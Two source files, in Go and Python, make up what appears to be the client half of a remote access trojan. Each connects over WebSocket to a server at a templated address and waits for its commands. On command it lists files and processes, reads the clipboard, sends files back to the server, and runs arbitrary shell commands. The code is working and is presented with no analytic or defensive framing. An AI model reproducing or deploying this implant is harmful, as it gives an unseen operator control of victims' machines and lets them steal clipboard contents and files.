File: client/go/ws_client.go
package main

import (
	"encoding/json"
	"fmt"
	"io/ioutil"
	"log"
	"os/exec"
	"strings"

	"github.com/atotto/clipboard"
	"github.com/gorilla/websocket"
	"net/url"
)

// CommandResponse represents the structure for sending responses back to the server
type CommandResponse struct {
	Command string `json:"command"`
	Result  string `json:"result"`
}

// CommandRequest represents the structure for receiving commands from the server
type CommandRequest struct {
	Command string `json:"command"`
}

// connectWebSocket establishes a websocket connection
func connectWebSocket(serverIP string, serverPort string) (*websocket.Conn, error) {
	u := url.URL{Scheme: "ws", Host: fmt.Sprintf("%s:%s", serverIP, serverPort), Path: "/ws"}
	log.Printf("Connecting to server at %s", u.String())
	conn, _, err := websocket.DefaultDialer.Dial(u.String(), nil)
	if err != nil {
		return nil, fmt.Errorf("connection failed: %w", err)
	}
	return conn, nil
}

// handleCommand interprets and executes commands, returning the result as a string
func handleCommand(command string) (string, error) {
	command = strings.TrimSpace(command) // Remove any extra spaces
	switch command {
	case "list_files":
		return listFiles()
	case "get_clipboard":
		return getClipboardContent()
	case "list_processes":
		return listProcesses()
	default:
		// If command is download/upload/execute, further action may be required
		if strings.HasPrefix(command, "download_file ") {
			filePath := strings.TrimSpace(strings.TrimPrefix(command, "download_file "))
			return downloadFile(filePath)
		} else if strings.HasPrefix(command, "upload_file ") {
			filePath := strings.TrimSpace(strings.TrimPrefix(command, "upload_file "))
			return uploadFile(filePath)
		} else if strings.HasPrefix(command, "execute_command ") {
			cmd := strings.TrimSpace(strings.TrimPrefix(command, "execute_command "))
			return executeCommand(cmd)
		}
		return "", fmt.Errorf("unknown command: %s", command)
	}
}

func listFiles() (string, error) {
	files, err := ioutil.ReadDir(".")
	if err != nil {
		return "", err
	}

	var fileList []string
	for _, file := range files {
		fileList = append(fileList, file.Name())
	}
	return strings.Join(fileList, "\n"), nil
}

func getClipboardContent() (string, error) {
	content, err := clipboard.ReadAll()
	if err != nil {
		return "", err
	}
	return content, nil
}

func downloadFile(filePath string) (string, error) {
	data, err := ioutil.ReadFile(filePath)
	if err != nil {
		return "", err
	}
	return string(data), nil
}

func uploadFile(filePath string) (string, error) {
	fileData, err := ioutil.ReadFile(filePath)
	if err != nil {
		return "", err
	}
	return string(fileData), nil
}

func executeCommand(command string) (string, error) {
	cmd := exec.Command("sh", "-c", command)
	output, err := cmd.CombinedOutput()
	return string(output), err
}

func listProcesses() (string, error) {
	cmd := exec.Command("ps", "aux")
	output, err := cmd.CombinedOutput()
	return string(output), err
}

// receiveAndRespond listens for messages from the server, processes commands, and sends responses back
func receiveAndRespond(conn *websocket.Conn) {
	for {
		_, message, err := conn.ReadMessage()
		if err != nil {
			log.Printf("Error reading message: %v", err)
			return
		}

		// Parse the JSON message to extract the command
		var commandRequest CommandRequest
		if err := json.Unmarshal(message, &commandRequest); err != nil {
			log.Printf("Error parsing command JSON: %v", err)
			continue
		}

		command := strings.TrimSpace(commandRequest.Command)
		log.Printf("Received command from server: %s", command)

		// Handle command and get result
		result, err := handleCommand(command)
		if err != nil {
			result = fmt.Sprintf("Error: %v", err)
		}

		// Send response back to server
		response := CommandResponse{
			Command: command,
			Result:  result,
		}
		responseData, _ := json.Marshal(response)
		if err := conn.WriteMessage(websocket.TextMessage, responseData); err != nil {
			log.Printf("Error sending response: %v", err)
		}
	}
}

func main() {
	// Get server IP and port from program arguments
	serverIP := "{ip}"
	serverPort := "{port}"

	// Connect to server
	conn, err := connectWebSocket(serverIP, serverPort)
	if err != nil {
		log.Fatalf("Failed to connect to server: %v", err)
	}
	defer conn.Close()

	// Start receiving and responding to server commands
	receiveAndRespond(conn)
}

File: client/python/ws_client.py
import websocket
import json
import os
import subprocess
import pyperclip
import threading


file_write_handle = None
download_in_progress = False
current_filename = None

def send_result(ws, result):
    response = {
        "action": "send_result",
        "status": "success",
        "result": result
    }
    ws.send(json.dumps(response))

def on_message(ws, message):
    global file_downloads

    try:
        if isinstance(message, bytes):
            if file_write_handle:
                file_write_handle.write(message)
                print(f"Received file chunk: {len(message)} bytes.")
            else:
                print("Error: Received file data without an active download.")
        else:
            if not message.strip():
                print("Received an empty message, ignoring.")
                return
            response = json.loads(message)
            if response.get("status") == "completed":
                print(f"Download completed for {current_filename}.")
                cleanup_download()
            elif response.get("status") == "error":
                print(f"Error during download: {response.get('message')}")
                cleanup_download()
            else:
                print(f"Received message: {message}")
                command = response.get("command")
                if command:
                    handle_command(ws, command)
    except json.JSONDecodeError as e:
        print(message)
        print(f"Error decoding message as JSON: {e}. Raw message: {message}")
    except Exception as e:
        print(f"Error processing message: {e}")
        cleanup_download()


def on_error(ws, error):
    print(f"Error: {error}")

def on_close(ws):
    print("Connection closed")
    cleanup_download()

def on_open(ws):
    print("Connected to WebSocket server")

def list_files(ws):
    try:
        files = os.listdir('.')
        result = "\n".join(files)
        send_result(ws, result)
    except Exception as e:
        send_result(ws, f"Error listing files: {str(e)}")

def get_clipboard(ws):
    try:
        clipboard_content = pyperclip.paste()
        send_result(ws, clipboard_content)
    except Exception as e:
        send_result(ws, f"Error getting clipboard content: {str(e)}")

def download_file(ws, filename):
    global file_write_handle, download_in_progress, current_filename

    if download_in_progress:
        print(f"Another download is already in progress for {current_filename}.")
        return

    try:
        save_path = filename
        file_write_handle = open(save_path, "wb")
        current_filename = filename
        download_in_progress = True

        request = {"action": "download_file", "filename": filename}
        ws.send(json.dumps(request))
        print(f"Download request sent for {filename}. Saving to {save_path}.")
    except Exception as e:
        print(f"Error initiating download: {e}")
        cleanup_download()

def cleanup_download():

    global file_write_handle, download_in_progress, current_filename

    if file_write_handle:
        file_write_handle.close()
        file_write_handle = None
    download_in_progress = False
    current_filename = None
    #print("Download state cleaned up.")

def upload_file(ws, file_path):
    filename = os.path.basename(file_path)
    filesize = os.path.getsize(file_path)

    request = {
        "action": "upload_file",
        "filename": filename,
        "filesize": filesize,
    }
    ws.send(json.dumps(request))

    with open(file_path, "rb") as f:
        while chunk := f.read(1024 * 4):  
            ws.send(chunk, opcode=websocket.ABNF.OPCODE_BINARY)
    ws.send(json.dumps({"action": "upload_completed"}))
    print(f"Upload completed for file: {filename}")

def execute_command(ws, command):
    try:
        output = subprocess.check_output(command, shell=True, text=True)
        send_result(ws, output)
    except subprocess.CalledProcessError as e:
        send_result(ws, f"Error executing command: {str(e)}")

def list_processes(ws):
    try:
        output = subprocess.check_output("ps -aux", shell=True, text=True)
        send_result(ws, output)
    except Exception as e:
        send_result(ws, f"Error listing processes: {str(e)}")

# Handle incoming commands
def handle_command(ws, command):
    if command == "list_files":
        list_files(ws)
    elif command == "get_clipboard":
        get_clipboard(ws)
    elif command.startswith("download_file "):
        download_file(ws, command.split(" ", 1)[1])
    elif command.startswith("upload_file "):
        upload_file(ws, command.split(" ", 1)[1])
    elif command.startswith("execute_command "):
        execute_command(ws, command.split(" ", 1)[1])
    elif command == "list_processes":
        list_processes(ws)
    else:
        send_result(ws, "Unknown command")

# Main entry point for the WebSocket client
if __name__ == "__main__":
    # ip = "{ip}"
    # port = "{port}"
    ip = "127.0.0.1"
    port = "8081"
    websocket_url = "ws://"+ip+":"+port+"/ws"  # Change to your WebSocket server URL
    ws = websocket.WebSocketApp(websocket_url,
                                on_message=on_message,
                                on_error=on_error,
                                on_close=on_close)
    
    ws.on_open = on_open
    ws_thread = threading.Thread(target=ws.run_forever)
    ws_thread.start()

    try:
        while True:
            pass  # Keep the main thread alive
    except KeyboardInterrupt:
        ws.close()
        print("WebSocket client closed")

